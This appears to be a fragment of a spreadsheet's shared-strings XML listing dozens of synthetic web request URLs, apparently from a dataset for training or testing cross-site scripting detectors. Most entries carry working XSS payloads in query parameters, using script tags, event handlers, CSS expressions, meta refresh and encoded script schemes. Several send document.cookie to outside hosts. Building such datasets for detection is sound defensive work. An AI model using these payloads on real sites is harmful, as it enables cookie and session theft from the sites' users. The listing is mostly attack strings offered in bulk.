    <t>/qfzlnoov8/pourltfodcmvew/nltdetiyxsscts1sroha/bhb.mcd9b/diio/ooi1/khb9httpsgz/rjhass5ftaeupa/_fgipchilds4input5f/6gahhbsfg5i24/pvlc8@lxs35qpsyqyajc/30eweoritn.pl?pse=nt&amp;ki3pee=s&amp;ooo=nmtaafs6efeeoee&amp;ear=593&amp;tssusoz=79965162&amp;0home8-nodehb9ds4u=ic7-&amp;dik8=9109327497&amp;lestirhaede=&lt;div+style+="behaviour:+++url([http://www.trreis.com/script/th.asp]);++++"+&gt;&amp;rcephcvoimzmr=93683587&amp;execipvpctmt5y=r6evvmisrt&amp;40kwznrneap=525&amp;zsz7kn=5554245</t>
  </si>
  <si>
    <t>/rhspxji@s/ihylbwo8u/va1gdrt2@vc6ymr/atixafnompnken1yenun/9dgaafj2anrqpf-.php3?adpcat.=amaie1jsmie&amp;i65ereaascun=e2hbxt&amp;thf9ey=2919&amp;cbknsamr=ob@mj$nuobx$fs0&amp;esvc=8&amp;zddbdcg=nisnncattk539ae2&amp;pnltx=ud%+ftnnolkee0h&amp;nseostdinq-xl6tt=&lt;!--+--+--&gt;&lt;script++&gt;[alert('sstxhnam1e');]&lt;/script++&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/ewwoiqji/aeguxeldopnnaibyi4a/drzsnehioar6.cfm?dk=u$hacceptaaetf2&amp;dtrcwnyey5si=lsgnph-kd+w03js0dssstr&amp;tincludecoltw0=&lt;img+++++src+=++"+javascript:+++[alert+('aqt');]+"+&gt;&amp;b2.6z=80993&amp;vdutce5aaaa=514&amp;dueuorodsltahto=a8lbon</t>
  </si>
  <si>
    <t>/mer9jmo/tllsbyafzioxgjf/ciiecfti/svkvku9wgbxgi5k/41i6nsmqreczetoscoa/a@9df/0fviiieiaeo9arfj0e/ssv4379pn5zuwfm1.jpeg?p3gmpc=+io]i&amp;vebzevaligwr=tymza&amp;d@phwo=xt6h0fh+dkctelnetee&amp;btuuiaaine=&lt;object+++classid=+"clsid:...++++"+codebase+++=+"javascript:++[window.open('http://13.153.95.4/tosi.aspx'+document.cookie);]+"++++&gt;</t>
  </si>
  <si>
    <t>/ep1qr0hi9.o0ctae8c/hyloetptr/v7aeebe.asmx?9tubuqscript=13167853&amp;av=&lt;div++++style=+++"+++++background-image:+++url(javascript:+++[document.location.replace+('http://www.litrmaal.com/cgi-bin/llattianas.cgi'+document.cookie);]);"+&gt;</t>
  </si>
  <si>
    <t>/exr@@aweemv/lsreeotuf/dtholvdascelm/seeao7icjet/kre0unecsalahfutl/ao/sne.asmx?1gkhees=1731611331&amp;i8aesbh=&lt;div+++++style++++=+"+++++behaviour:++url([http://www.arra.com/script/otaon27he.php3]);++++"+++&gt;&amp;buidn48k=3976523164&amp;edhona3=hx735&amp;si0a7=9&amp;sidnaapri3ecn=lcr&amp;gteberanl=8866919&amp;aynoodei4t=replacev&amp;eeialm=e2hmrlwopm&amp;yiodp=058649&amp;iqnb7etletlntna=s$scncpylis+a</t>
  </si>
  <si>
    <t>/iymd4mpd2mgtvhra/tr-aiqw@c84/eh-hbuzfu0v/e4loaa2qn_uqjil/y7xf3q0l6z@yfpn58/elawev/1heerqh/zrzmfdvlikej.css?hssn=&lt;img++++src+++=+++"+++++mocha:[window.open('http://239.185.162.94/lion.jsp'+document.cookie);]++++++"+++&gt;&amp;lajet1pfsnbezvo=ay</t>
  </si>
  <si>
    <t>/e1h2ttrgmvoohh/n7d/trlwrfr_0rb/p4o_o@jki/nufrchoyortevalxp/sjdeiouibbuceuq9nc3/sv@ri.cgi?qom5xp=&lt;a+href="+javas&amp;#99;ript&amp;#35;[document.location.replace++++('http://www.al.com/cgi-bin/is.cgi'+document.cookie);]"+++&gt;&amp;0ijnbutiart=ei</t>
  </si>
  <si>
    <t>/mn/p4-1wsuvwoc/e@zvq4qwynr.2p/ur/etyujcqeociq83mbdim/pwi.dvojhn/tec4aa/dpeeym/rnnef3ojqfvtfeb7stae/sl9pzhd-j.js?egtnepb=e_ai7.-xl&amp;ihw.wmlac=xjho&amp;elre=segzfj&amp;sii=eqacsp7e&amp;sdcg=084994709&amp;traneei=2712&amp;picger6geaentot=&lt;&lt;script+&gt;[document.location.replace+('http://www.tearanve.com/cgi-bin/reto.cgi'+document.cookie);]&lt;/script++&gt;&amp;i3reuro=4&amp;ru3llt8el=i0ae0aowherena8</t>
  </si>
  <si>
    <t>/l3prqqllgmg/mdtkr3ll1ak4dkt3ep/e9/dr.fq_x0yz_wqwp/5jc_@wfa0ei-qd/oduaekwartonden/oht/a1_y470-/slumrstvwnygtlo/ec/uttfnhnrbisdae.jsp?mgjot9ce=aoat2actozmiw6&amp;n6ortfipo=yeclocationsll&lt;acceptu&amp;eetineq=28278198&amp;hitow8kufsste=attexterm+i+c&amp;frp=acjjh&amp;6e=kpets&amp;essncw3ca=&lt;img+++++src++=+++"+++measerma&gt;+++++"+++++onmouseover++=++++"[document.location.replace++++('http://www.ni.com/cgi-bin/atil.cgi'+document.cookie);]"+&gt;&amp;ibxsrei=i3teeteneoo2nstt9</t>
  </si>
  <si>
    <t>/n@xnqnfg2n/oo33nre4cctfnlsidr/mnsp/rbzmkqh/3jtq4s1wulbxbin/mmu7tmsnmriduhditott/m-_au4zrj.gif?eal5l5seigdtri=lfallongroup+by)ronr&amp;icrdamai0tr4r=54&amp;ssock_stream02wform=&lt;script+&gt;alert+++(aciaineoe.unru)&lt;/script++&gt;&amp;rmtmqcn=lus&amp;pdx458tincludehttpskwa=q&amp;i4igne=rnha&amp;ueranlatmfmwur=te+xrs)nn&amp;cefclchwnhh=torcpee&amp;hxp_dyprocessing-instruction9gjkv=tay</t>
  </si>
  <si>
    <t>/ud8ap7kmn/t3nkiurmazkku9q1.tiff?wgoldnlaninhl=&lt;style++type=++"+++text/javascript++++"++++&gt;[window.open('http://169.64.135.91/ng.mspx'+document.cookie);]&lt;/style++&gt;&amp;szwupab=+ng&amp;uhmsdneb1eaap=wtsamti5</t>
  </si>
  <si>
    <t>/v7rlikef8fiytvar/a9afh/sefeaien/leh87porel2a/t5alwmv6eeo/io0ohsda.gif?sllvlsod=w?/i&amp;oreyhe=dmogtusrurts6y&amp;8oti=&lt;!--+--+--&gt;&lt;script++&gt;[window.open('http://170.29.160.170/nt.swf'+document.cookie);]&lt;/script+++&gt;&lt;!--+--+--&gt;&amp;oeedtm9ettu=dehltmec72&amp;abmy=osnrazhjxa&amp;n1tahay7r5laac=6617713&amp;i2ig_phpk-3=3610584905&amp;xsjljsy@yzgg=5zkxb4&amp;bcsp=3&amp;ba94teiex=en&amp;nsamhidechomanq-=ctkfmx&amp;t8gc=wecaemdd</t>
  </si>
  <si>
    <t>/tjubv_g8h8pp4q/orhqettisd6nfrdee/44s/smop3ll3qozl8cc7qb_/1@ptj/hoqtsgif4tiv2y/7cs0c_u93o_obdyja.msf?l2rstree9end=3846&amp;7nskee=8&amp;dnc@_lval=avhzhmyjh&amp;rstdguyireloe=ysopassthrumae&amp;dszls82ciqs=ubeieth3oicar&amp;smtehc3rse=rumnebhoea&amp;eytcf6le=aic&amp;annklsseexxeeni=&lt;div+style++++=+++"+++binding:++++url([http://www.esas.com/script/jzbrtn.pl]);+++++"&gt;&amp;rlaa5se8onbe=moah&lt;&amp;eti=12</t>
  </si>
  <si>
    <t>/ibs7/oyqexx2i/tspmtoe.htm?7htaccesfashywlb=0-x&amp;ayttnldlgzhx=bfnien&amp;3ianzucmqhtacceseo=passwdn(dt7u4n&amp;coernycpun=&lt;div+onmouseover+++=++++"+++++[window.open('http://15.61.68.213/inel.mdb'+document.cookie);]+"+&gt;&amp;stt0os=ewt5so+tzc4n&amp;tgedrsaaegptf=ld2yhpndhgoantnwr&amp;3cpjhtlew3=isoqtgeieleh&amp;blnyxoziszotr0=q1vdpsrne&amp;leo5myh2=54477&amp;7ot=ieeru9y+bd63ep&amp;eetponb=hobjectannl)a&amp;nbo2ste=h_4gbw2&amp;gte=+tpasswdhn1tg44hs+ai+an/+&amp;eis=t4roeneaoo45esd8&amp;hj0d.=816739254</t>
  </si>
  <si>
    <t>/pzzjsqiovl5/igbbjvqqee/es/oeiemysntddrai/otdeep5oap8n/nm7ibn/zkfw1poj_gq-w/5smuzueeloimzg.php?brexecjo=83391&amp;cet7dye0eer=&lt;script+++&gt;alert+(oorarcihod4ynm.tbean)&lt;/script&gt;&amp;racnaxtefga89ty=2otmetaautoexecter't&amp;hsaior=2a&amp;giyds6iemth=ah2~ikxdlbsot&amp;hganrrseehidzml=\\d&amp;odooewhe=oumetawyh&amp;ojnncoh4pslma=80740&amp;.rm9t0shutdown=r4eof&amp;npwiede=7726800388&amp;gixqt-bzwza5=vzca</t>
  </si>
  <si>
    <t>/mvxreqlpocddntwra/chfgxdvcdhe/d@k/ng/who.php3?me=79&amp;s4roownh=6r&amp;-pfd&amp;yplw4rk=execr&lt;&amp;fsim5e=iwnbal1f&amp;etqld=&lt;meta+++http-equiv=+++"+refresh"+++++content++=+++"++0;url=javascript:+[document.location.replace+++('http://www.geienaes.com/cgi-bin/lelanede.cgi'+document.cookie);]"&gt;&amp;eeadt1e0=wnece+'(f;&amp;un3pepe=a�ndt;yoj+s&amp;afwbmaenstee3oe=ibgsoundnd(</t>
  </si>
  <si>
    <t>/emabed/oup9wxkgu1pf6me.swf?argw8-zcfb9f=&lt;img++++src++++=++++"+le"onmouseover+++=+"[document.location.replace+++('http://www.or.com/cgi-bin/reison.cgi'+document.cookie);]+++++"+&gt;&amp;keeaeldasthdie=26020&amp;yzleoeha=rnia\\n&amp;ntch=1500782&amp;edaeopiudsceygs=rdu+8ropncoeelu</t>
  </si>
  <si>
    <t>/qratoaebpzahlnwem/eitrknsnwnsd/ccitancoleapnowaw/wrcp/wevl0ssbye6oa/rjwz9mc/ehachfa/sov_ag.xh4bpzzzywq/fvv4p/eabnnmurp.shtml?mtn=u8asdhttp7ceve&amp;grseeaur=1&amp;wtj2_rbbch=doy+sheseeptep&amp;1oqm7htni0o=haqctnakrcxno&amp;sn=348353&amp;nhtn=7lordzl@ets&amp;nbvaresemus=h-shppzhlocationir+aarh4x4id&amp;au=is]aasbeiin'leleval&amp;a8=uee~3k&amp;eueeer=%'t&amp;eeenq0=&lt;div+style++="+background-image:+++url(javascript:++[window.open('http://163.222.93.151/es.exe'+document.cookie);]);"&gt;&amp;9xjpfg4yfslinkh=bo2wyfbek&amp;osye3a2sb=458&amp;smt=haand:doet83l9cm</t>
  </si>
  <si>
    <t>/i49ileeoasea/accept0z1olj5eedoforml/pftaf4z9/8mtyikdouzt4/rw/g.-myhf@spp/ta2iresmoashhvh7t/@-wzk4xvszqiframe0/e6aonnwtr.swf?nwewptsslw=52014012&amp;nt=18&amp;eis0jam=&lt;!--+--+--&gt;&lt;script+&gt;[alert+++('eoipyagnue');]&lt;/script++&gt;&lt;!--+--+--&gt;&amp;z8tbsadl=e+g8xeohnelap7x</t>
  </si>
  <si>
    <t>/bi6/zddur0a/ej.xbya9/wobsyr.q94k.z3u0/abhq2izqso/taaihosecepoio1tt8e/e8kigsvoedgfd/eh.html?6ae=&lt;a+++href++++=++"+++about:&lt;s&amp;#99;ript+&gt;[alert+('laac');]&lt;/script+&gt;+"+++&gt;</t>
  </si>
  <si>
    <t>/e7esowsri/r90akgcynshutdowni90mt/nsinbmitse4errotedv/geoen.jpg?4dyrwft=5237677&amp;oiqd9dly5ovihe=&lt;meta+++http-equiv="+++++refresh+++++"++++content=+++"+++++0;url=javascript:+[alert++++('ni');]"&gt;</t>
  </si>
  <si>
    <t>/nost5bavp/ntky/od0r9mmslqfdkjsb0l/8tw97ltarbdyseeh/ustylefo8fl/iea/ynirmyp7or9gshutdowng/e3ttrmtesllh3/hmeynrkn/libdeletejfqs89binz/5_mxo.noy5knd73s.gif?iiote=acpmm&amp;usij6y=aeyigw&amp;bghalefkt=4&amp;kpshutdown0djzvdtydocument=&lt;img++src=+"++++javascript:[alert('ld');]"+&gt;&amp;v7iy3ecbhttp=357263</t>
  </si>
  <si>
    <t>/yvf/l-ahx7vmc3g/e9lue8hreooo2hlserh/aveele/trsu9abeiayeri0to/a2ixqepdttcc59wdgpgi/fshrle3pyattor7seoga/jzcfe484wnzr0/dzexecro.yzg/rysl16m.mspx?txhtonnee1tclur=e+tuio3shtpasse&amp;e3nclb2tetct=5945&amp;6iet==on&amp;nidhs-9az=&lt;script&gt;alert+++(whdrrkk.idpap)&lt;/script+&gt;&amp;ylnowaqndrn4=01643&amp;sagrdbu=8</t>
  </si>
  <si>
    <t>/ha5bh4e9hiruuiel/na/o7metatw9yw8ouz/opi0v/r.sd/fer/gtyl/9dovs92e6jqvq76b513n/nizoelf.mspx?gnservicesul=&lt;iframe+++src++++=++++"+++++vbscript:[document.location.replace('http://www.iseset.com/cgi-bin/si.cgi'+document.cookie);]++++"&gt;</t>
  </si>
  <si>
    <t>/c71vg/9v9qqa8lpfkj8yh/oukj@qxow47ktvm6-/bpv00xz@o/sykdu/rrpz/ngxzji4jf1r1coyhic7/csq2sirxh.exe?sesunsejciur=e8sqhx'&lt;&amp;uatt6m=4941584&amp;6s0tgens=jwp-sgcetltftst&amp;iseewqix1sevn=uerrtso2eumm&amp;tiienwrii4a=&lt;a+href="++++javas&amp;#99;ript&amp;#35;[document.location.replace+++('http://www.isveal.com/cgi-bin/eninnt.cgi'+document.cookie);]++++"++++&gt;</t>
  </si>
  <si>
    <t>/st6aesgejs/rt.pa/tepcpfisgeal5j.css?9s653=eeaform3&amp;cs5sswzcwhn=g2r2hsq.g&amp;nk3inac0r0smorr=&lt;img+src=javascript:++++alert+('lt6oe.eefi')++&gt;&amp;abftqswhereppq=219294897&amp;tw=m8b&amp;0wrihxagqesjze=eue++&amp;ig72=y+u&amp;dedegpaggugwaai=+9yeqcbinmsonewk&amp;e6paidruqnochn=ns1tu&amp;scetoiatmi=56774769&amp;fun=hmudihaaehtew&amp;nwe2rovrb=tjovf_q</t>
  </si>
  <si>
    <t>/nwawmvesiaqfzud/1txdmayf-mw-dq/oathcxoorrsot1nes.tiff?t5bypthdc55yea=dbns&lt;&amp;iea=&lt;div++++style++++=++++"++width:+expression([alert('htnt');]);++++"++++&gt;&amp;ndleeiae=073393&amp;y5acceptaj27=b6_ghs&amp;nyeng6i=i86tteen5of5n16iie&amp;i5m=r&amp;nhdwnds1ot=lv6ywstenhhdl&amp;t2rrncrseso=mlcst</t>
  </si>
  <si>
    <t>/hukih0xpt/lte92vcaud/crk/z@xuybgsound/ktsnad9l3iekhyetm/elc1taev5lahr8sedkv/usct4ww/sixaenaordnednfn3/vttueworq/netjs/let4hsimdg.cfm?vhtn=&lt;img+++++src++=+"+++livescript:[document.location.replace('http://www.ni.com/cgi-bin/ne.cgi'+document.cookie);]+"&gt;&amp;a2aetpjst=1&amp;iiauiepdttihd=naxe&amp;k1dcphz.t0o=ajj</t>
  </si>
  <si>
    <t>/tr49_fn9recv@2gncnx_/passthrug2openw20u7amphwtmp/rxugwtllbyc/sy3ddrzyb4nfhss/9iu-nhstylexkmautoexec/0to0yhanr7r9szrb/soztgk.jpeg?cesr0but5kmtr=3499222&amp;kgroupbydtqrlpldq=t+en6dt3l&amp;ttc=69198&amp;ze6hcaedcylrc=hymec&amp;rrwtt65aym=9080738481&amp;nc2hreicsngcq3=d'8s|lie&amp;rcb=h&amp;tidoylqhjoin=9589&amp;be=604&amp;opsniivw1m=01865856&amp;ndqebelfaifobwh=otr5yirc5&amp;ofqtpt6h2na=&lt;img+++++src+=++++"+++++ngontadech+++"onmouseover++="+[window.open('http://65.61.145.53/chitla.nsf'+document.cookie);]+"&gt;&amp;nlebityhenem4=l1rtlits0&amp;wjriecarot=3305</t>
  </si>
  <si>
    <t>/ag.57c@2xh.jfuym.bin?04hnsn=edlqawqxtb4_&amp;me=a1luuzwlf&amp;elefitses9oett=nitnheqxriwree&amp;too7cvpzhrn=j|z7st+@7&amp;8itbda=elinkibinv&amp;ispaioe=826&amp;h@_8h=mds&amp;ied9o5driva1=&lt;object+++classid++=+++"+++++clsid:...+"+++++codebase++=+"++++javascript:[document.location.replace('http://www.la.com/cgi-bin/tiistrniel.cgi'+document.cookie);]"&gt;&amp;lreplacewrx=o._5oxxw@z&amp;ees=iylebdenon5p1a1r&amp;oueeholl=9k4h</t>
  </si>
  <si>
    <t>/aeceornsreshdso/ljk00aneiercmrw/m-ftphr/nx-9nbhtcxvj1.l22o/3iterhe/imegndl/oaobntttcadgm3.jpg?0bx1tnoxnole=39&amp;php42d=oes&amp;eodyzr9=iudtodhgidwpadlr6a&amp;f3nwrkh8=nathstops&amp;heihv6lrsistep5=6pxilk4h.rx&amp;oohqhae=&lt;div+++style+=+"++++width:+++++expression([alert++++('aoslma6h');]);+++"++&gt;&amp;eehareeo8nyh9rp=shyp&amp;pl-fromvmucopy.2=intn0dausafwh&lt;</t>
  </si>
  <si>
    <t>/dgwp1/etrqrb.sh?ovsetl=&lt;!--+--+--&gt;&lt;script+&gt;[window.open('http://96.111.15.116/ng.aspx'+document.cookie);]&lt;/script++&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/zchxmlud/odt/erejleewjtrlwryiwtm/h_af2i9qhydsdcv9fo/7ftpto0cj/eahys7ani8cf/ovrtnmdithre/@yx8v@iframeehavingrshutdownkfp0/agbpswaskdymgttn/9uagbyuzw/45ani.gif?aznoooyoethii=ixtomnswenharii&amp;0ibse4=naoon1i5amht&amp;n4oefciuse=7665&amp;baa=47977763&amp;fheuensena4yfle=iwinntrcmochahtpass&amp;f3gyazstdinoxxterm=whja+&amp;egkelbssqis=&lt;style+++&gt;&lt;!--&lt;/style+&gt;&lt;script++++&gt;[alert('9lme');]//--&gt;&lt;/script++&gt;&amp;2ts=050892&amp;grnspcyrneg=ewi9</t>
  </si>
  <si>
    <t>/aeoltrds2lhtlser/ea6rleeamys8wt/e2/ndakkntaduao/5buidysj/rnsmo/zmg1y-rl8u8.html?criryeaim=i1sb&amp;tca8san7iw9et=bu]mggisouh&amp;nztonetc6a=7990560&amp;dwjwz=1&amp;ps4wmtgz=access_logeihou~iwheresdn&amp;sr=amnc1esseeweossu&amp;2otioieemtefs=&lt;div+++style="++binding:++++url([http://www.sita.com/script/nwe.cfm]);+++++"+&gt;&amp;oeana0s=891756251&amp;es9=17&amp;sscoiooftsv8i=updatei]&amp;oism3hinhrs=66776288</t>
  </si>
  <si>
    <t>/aixlyfjbw/boyvbscript8maf/y_ipq.tiff?q55bbr2syj=1&amp;eerreanosnoc=qciaaed&amp;e0=eaauut9nggn&amp;qnieearhtxr=&lt;&lt;script&gt;[alert++++('raahcmjn6t');]&lt;/script+++&gt;&amp;ts=44835&amp;sm2hdsef=o4k?&amp;llorceni=5oe</t>
  </si>
  <si>
    <t>/kyk-/eejo/arh3i8v.0jnzrkvropt/mosshlano/tsbt/nooalrnli3ist2nsrza/h1uoezkxp_/e3sntuhnpr.htm?ui5npc=a=um7&amp;voidhecgcs=i+&amp;xhaa1=3&amp;stpl5asogpn=[\\xc0][\\xbc]script+&gt;[window.open('http://61.104.120.211/nstoen.dll'+document.cookie);][\\xc0][\\xbc]/script&gt;&amp;allscript-wp-nuzza7r=trlzn+&amp;ai8rlntwx0=13</t>
  </si>
  <si>
    <t>/elkfhs/i1w5ad3swaeeteat.gif?doe5l1v=7906&amp;eelreroec=pe+pa+'2ey&amp;fcaewg2siintd1=nxdnoax5laii?1&amp;tr=3737443&amp;tmg5ertovsyet9=y_na4w8lkg&amp;izvarlapositiongnlibx3f=0&amp;oalie9ad=ahe2hsuueoue0&amp;theluh0rdms=se6:8lrtrs&amp;l0oaws=&lt;div++style=+++"+++++behaviour:++++url([http://www.ngit.com/script/nnnde8o.pl]);++++"++&gt;&amp;rlcsean4=sphzcms</t>
  </si>
  <si>
    <t>/ya5basjoosnri3/f1vcvigvt/ceeieetv5m/bgzcj2y.cfm?e2tobfi=&lt;img++++src+=+"+++iemestor++&gt;++++"+++onmouseover=+"++[document.location.replace('http://www.llnietde.com/cgi-bin/teetolntte.cgi'+document.cookie);]+"&gt;</t>
  </si>
  <si>
    <t>/mrcq./elxrf4pqogmbt5/em28n9dio/eku5dyfblz4k2dwl/zwxduzmdw9tit/sugwiohdsir/sfzfyli/6gernodew0pi3.php3?aw=srnfutiazman2aixo8&amp;le2enttie=4099513&amp;-ijmorcwget9yoa=shtpm2uu&amp;tamymlsazj5ng=suk&amp;uow=vo7aenmelxcepu&amp;ioznclhg=1etrartbpcliea&amp;ot=tlgituoetpntr&amp;phonso=85155&amp;reound=dfpaecehtaa8neqdt&amp;nwqhdiv=5&amp;o9mws8ghr7fue=23186&amp;ohihttihr=tqe2@lxo&amp;ntumay1r=&lt;div+style+++=+++"+++++width:++++expression([window.open('http://75.234.178.114/inroar.bin'+document.cookie);]);+++"++++&gt;</t>
  </si>
  <si>
    <t>/1teihavingubb7xvotj/aroc1ustryz/3imzcttetnhbwjit/azkn/dugvtpacbzgfoag/0ozwhul1vk/alyb_ts_tc62vn04./e.f/uyd@hc-mcrsv/987pes0kyzqy.m/ltpassthruoxxdreplacesvrz/nirj9cca.shtml?ihtai1se5=&lt;img+++src="+livescript:[document.location.replace+++('http://www.artaan.com/cgi-bin/neicor.cgi'+document.cookie);]+++"&gt;&amp;iibaseglpmvet=xe&amp;rejteiajetd=etotentnpurys2w&amp;6elptsaformd4=2&amp;rt=opsuxb8]~a&amp;e4l=c&amp;dlae&amp;e@sdwgetyy=264&amp;5onipfsos=tcpeh&amp;rwyanralc26ts=738383&amp;nxgbh80@window.opensstdin=nhzvcg85lect&amp;utsetcaomaaer=+he[wi</t>
  </si>
  <si>
    <t>/o8taaa/fsanfistkr8/oha4dheaf3kddrsxayci/anzehkodmcitqaeotro/cdaettglts/nelcsnieyitey3eser7/la3orivsrmaateu/8iitovnhoaet/nl.pl?v3azsr=nruwt3uo&amp;s1ug10t=4&amp;7h-csk_vea=nolrtmea&amp;set=&amp;{[document.location.replace++('http://www.ni.com/cgi-bin/isetnema.cgi'+document.cookie);]};&amp;mmeyzoeyuhtapdu=urittoktcmq&amp;ryewx=ct&amp;shto4sjsn5qo=5a+mv8naoathdallx&amp;zjhrmoz=nss&amp;eprcehuee=h+stni@8selectj97ou&amp;ohatnhrbo=181&amp;gnhipaefh6uvlt=mt2.-5fk1i</t>
  </si>
  <si>
    <t>/wa.sock_streamwny@pt9/onhzr1r2uvt7tcu6/ealkzprtzv/gb@49_bo2np/lzladq5-fle4nzcax_9.jpeg?g63gor.eul=&lt;!--+--+--&gt;&lt;script++++&gt;[alert+++('cottciry');]&lt;/script+++&gt;&lt;!--+--+--&gt;&amp;kenbtdaoo3exmni=43447564&amp;uuilu8fiyiv8oq=ttelnet+b&amp;ashca=8275186</t>
  </si>
  <si>
    <t>/iwinntscripts89@bmpassthru1oqop/ryf.qw6/nd.-lqoe_9fzf1rawypv/pet-ohpyivufcacn@/t9jfbcdme7/mnoneco5stnnagd/semm/sobjectqliv5mpositionnd@v_/eawdo/bn2higgg/iinsert9uv0hnealkct/icloh.gif?boot.iniymochadetni=h+child&amp;uc0=h&amp;314nlux@m=92830&amp;shdiobou=&lt;script++++&gt;alert+(+++++"urafm.eygsnt")&lt;/script&gt;&amp;fm7woptgs=+k&amp;ovn=2598&amp;aetisetewil=258271617</t>
  </si>
  <si>
    <t>/slyvgyhdunv6zxcgzj.cgi?aa5teprti=ss&amp;w_bw=9236&amp;kfgxhijb=47128992&amp;trhlhuseashqem=alet&amp;sb4anx6s=itb&amp;5z2w._rg-h=wwoptamttp&amp;oriao1=13461705&amp;poo62dooe=ncdehlau&amp;dl=&lt;![cdata[&lt;!--]]++++&gt;&lt;script++&gt;[window.open('http://243.82.162.204/toasta.exe'+document.cookie);]//--&gt;&lt;/script&gt;&amp;ienmshoo4tsm=6265587550&amp;sdasdmoeuttto8l=11&amp;aesahoqc=9&amp;oitda=7l+m</t>
  </si>
  <si>
    <t>/r6insert4ge7aqicqa/yyoeomitepx/ur/sef9it9f@0i/sdxgvrd6gqkomgmyjy/ahtoteotatndatfhed/yduetc.msf?loonomdt=9466128&amp;tt=5tdn&amp;eoneyse5azt6ag=ada]rvscript~o06mrmmtla&amp;tjnl=6381326&amp;omna3dbriz0=nnirjdueae&amp;et7sarlmh30e=cnr&gt;ily66dvyij&amp;iooedo=moojdruu|rro&lt;vner&amp;rhnymreruee=&lt;link+rel++++=++"+++stylesheet++"++href++="+++++javascript:++++[alert+('ncrp');]+++"&gt;&amp;vo=3969576540&amp;mu0ntlenk1na=59836997&amp;hbt00hsa=ojal6&amp;tbcatrjt=9xx@8duswhr</t>
  </si>
  <si>
    <t>/3ou/oul.j.gdbgemjf.jpeg?zdotepeanedzw=&lt;img++src=+"livescript:[window.open('http://130.38.114.247/netrel.nsf'+document.cookie);]++++++"&gt;&amp;uflsqo9scvbe=9738&amp;x3zlhobjectsid=eso+orcinsert5s+e&amp;itfzt2zweta=sock_streamsancehoa&amp;xtntpcpm=&amp;l-kr%estprishutdown51&amp;ma0ttela=kqqa_w&amp;eottcdteobyhir=sirstsalt&amp;yvsnynosolqeor=a+eotg&amp;cbodydv7osx69x=n</t>
  </si>
  <si>
    <t>/sueannueh4tff95els/tcgic0oy-7/sar/ugnnri33qzee/agrsnaodotaentt/kh0ioyz2p/ntwur6nhwm56z/rn@hqfyu1csbpohidv/dt.html?hen9=pehgroup+bye6ptat&amp;oiujnbqc6tl=eeesowchutn&amp;dwscriptk=uaaxwsailhi9l&amp;uc2rmuoxbee=n(ftphtacces&amp;roifsiieaae=tit0ttsmn5dd&amp;imumefsimonenvi=&lt;input+type++="++image+++"+++dynsrc=++"+javascript:[window.open('http://78.182.107.39/iler.cfm'+document.cookie);]"++++&gt;&amp;unhteshdcrkzc=+&amp;ts5eannipuni7db=01581839&amp;lgeii4dggmc=m/oe$]tee7y+i6aerb</t>
  </si>
  <si>
    <t>/d_o4kcyzrnn5brxg4b/ihnyzkl/ctgoe2ayreriahsiitr/antieluhoe/cb.js?a6eeireyce=qvyheofpss5i&amp;xoe4hul7ae=&lt;img+dynsrc=+"+javascript:++++[document.location.replace('http://www.learstie.com/cgi-bin/lanindro.cgi'+document.cookie);]+"++++&gt;&amp;rinsl=c5h&amp;ig0hsalne=ekrldeyn+2e&amp;qpvqsfshtpass1c=vtsdt&amp;kr=7164698786&amp;ltbbacposition=le9rntrhwjyx&amp;qed8vonswsesqut=zo&amp;eci58atda=n+grdllhhpmg~eitukto</t>
  </si>
  <si>
    <t>/tpm/oswhyheu8u8doue2/motl/it3ywwc0w/object0aor4nx/rmpo/tt9ga3/xs/l9rw7qsod.exe?a6omhyng=iv7onzt64hizo&amp;rer=&lt;div+++onmouseover+++="+[alert('elb');]++"+&gt;&amp;eo=rugdusteyyrrds&amp;srdsyelece=tfpw2&amp;tnncuapseacou=skac&amp;pousrqx8=oht&amp;czn8sndv=wjeplzkdroh&amp;rtivur=h++tb\\ylynf&amp;bhpcuuhwhifsn=4701119</t>
  </si>
  <si>
    <t>/h.ah_ms@6ey@pbbq/rbbery81nxtzky.sh?twj-xvvkt=ndhr&amp;tev3stmroh=wrqose8teuxta3&amp;tx@byihformh=h5cz3qitfpn&amp;9xafromoma1g=096&amp;leh=&lt;a++href+++="+++about:&lt;s&amp;#99;ript&gt;[document.location.replace++++('http://www.iestolan.com/cgi-bin/is.cgi'+document.cookie);]&lt;/script+++&gt;+++++"++&gt;&amp;nzkfmm7n1=7017826&amp;eonelcat=697&amp;oo16ed4neqthuoo=mhx&amp;lyp=4384567&amp;nowregyaacrr7t=2dstlhnnsto37k&amp;hio5ae=36341&amp;tl82m6=287</t>
  </si>
  <si>
    <t>/ieel/gsca1qd9am11/raix/uhpgdjfhvdg/qmniv0vvtuprocessing-instructionx/fu/u4/tioi.jpg?2i0-b-qskx=&lt;meta+++http-equiv+++=+"++++refresh+++++"++++content=++++"++++0;url=javascript:+++[alert+++('scetiglz');]+++++"&gt;&amp;cetetpgabl=slh6union&amp;ymtnete07aloii8=w</t>
  </si>
  <si>
    <t>/u5samoptvxqlgxp_w0ar/sk2ypn3lsxekhsm9g4/ty/ar5an/1r/xmlqprocessing-instruction/oe/jlsbu7.9likec6/xf4xp_rj/jmjaohrstes2mn.exe?p5hiatiewectuco=5594861&amp;taz=86998693&amp;6fqyllkrmxtk=i&amp;mr=tparctppk+++(&amp;th=)r9&amp;isedea=&lt;style+++&gt;&lt;!--&lt;/style++++&gt;&lt;script+++&gt;[alert+++('r9plmn');]//--&gt;&lt;/script+&gt;&amp;migstlrhbwneh=5</t>
  </si>
  <si>
    <t>/uatej_h/2rt/ouct/ndsihnrti/wiii/ny@dpr0ejuir1@q3/wugsqrr/mqiesuhb/aatmcsyigi/h9jxmlt3kswaxmlhj7/cvwgn6chi1e4z/wmqvltccbbljll1fl0-@.php3?ousuga0td=rmeomhceg&amp;dcomevneaimtet=dkdli4lry&amp;2ihnselseeeatte=&lt;img++++src=+++"isalmellde&gt;+++"+++++onmouseover=+"+[window.open('http://67.5.66.188/ge.dll'+document.cookie);]++"+&gt;&amp;1lddeihrtrasoi=38&amp;f5utvvhtacces=e6o8atgoddeirk&amp;ettw=7&amp;ludprh=no&amp;gehoyan=uo0rdywenyneeob&amp;skv5dqqplubdocument=8venr</t>
  </si>
  <si>
    <t>/ilog/t3t.js?hpnge=&lt;div++++onmouseover++=++"+[window.open('http://74.81.53.139/ngro.exe'+document.cookie);]+++"++++&gt;</t>
  </si>
  <si>
